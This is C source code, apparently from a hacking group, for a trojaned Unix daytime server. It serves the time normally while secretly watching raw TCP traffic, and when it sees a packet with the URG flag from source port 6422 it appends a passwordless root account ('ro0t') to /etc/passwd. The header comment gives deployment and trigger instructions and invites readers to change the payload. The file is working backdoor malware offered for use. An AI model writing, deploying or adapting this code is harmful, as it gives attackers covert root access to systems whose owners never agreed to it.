/* EXCLUDED-TEAM (www.excluded.org)
   daytimetroj.c

this is a tojand version of a daytimeserver (tcp/13).
execute it from the inetd- now the daytimeserver can be used as normal.
connect with telnet on 1.1.1.1 13 and u ll see the date + time.
but what u dont see is that the server listens on a raw tcp sock too.
like it is coded in check_raw(int *sock) is checks the tcp packets for
specials. here (standart) it looks for tcp +urg packets form the source-
port 6422. if he caught such a packet he ll execute  do_evil_things(void).
u can modify this function as u want. in standart it creats an
root account.
ro0t::0:0:muahah:/:/bin/bash

to activate the trojan use the programm trojactiv!

l0om
*/


#include <stdio.h>
#include <sys/types.h>
#include <sys/select.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>



#define TROJPORT   6422    /* trojan raw port */



int check_raw(int *sock);
void do_evil_things(void);  /* modificate this function as u want */


int main(int argc, char **argv)
{
  int listenfd, connfd, rawsock;
  struct sockaddr_in servaddr;
  int check = 0;
  time_t istime;
  char buffer[40];
  fd_set rset;


  rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
  if(rawsock < 0) {
    fprintf(stderr, "cannot set up socket\n");
    return (-1);
  }

  listenfd = socket(AF_INET, SOCK_STREAM, 0);
  if(listenfd < 0) {
    fprintf(stderr, "cannot set up socket\n");
    return (-1);
  }

  servaddr.sin_family = AF_INET;
  servaddr.sin_port = htons(13);
  servaddr.sin_addr.s_addr = htonl(INADDR_ANY);

  bind(listenfd, (struct servaddr *)&servaddr, sizeof(servaddr));

  listen(listenfd, 2);

  while(1>0) {

    FD_ZERO(&rset);
    FD_SET(rawsock, &rset);
    FD_SET(listenfd, &rset);

    memset(buffer, '\0', 40);

    select(rawsock+listenfd+1, &rset, NULL, NULL, NULL);   /* listen forever */

    if(FD_ISSET(listenfd, &rset)) {
      connfd = accept(listenfd, (struct sockaddr *)NULL, NULL);

      istime = time(NULL);
      snprintf(buffer, 40, "%s\r\n",ctime(&istime));
      write(connfd, buffer, 40);

      close(connfd);
    }

    if(FD_ISSET(rawsock, &rset)) {
      if( (check = check_raw(&rawsock)) == 1)
	do_evil_things();
      else continue;
    }
  }


  return (0);
}



int check_raw(int *sock)
{
  char buffer[1024];
  struct iphdr *ip;
  struct tcphdr *tcp;


  ip = (struct iphdr *)buffer;
  tcp = (struct tcphdr *) (buffer + sizeof(struct iphdr));

  if(read(*sock, buffer, sizeof(buffer)) != -1)
    if(tcp->urg == 1 && ntohs(tcp->source) == TROJPORT)
      return 1;
    else return -1;
  else return -1;
}


void do_evil_things(void)
{
  /* here u should add whatever the troajan should do! */

  system("/bin/echo  ro0t::0:0:muhaha:/:/bin/bash >>/etc/passwd");

}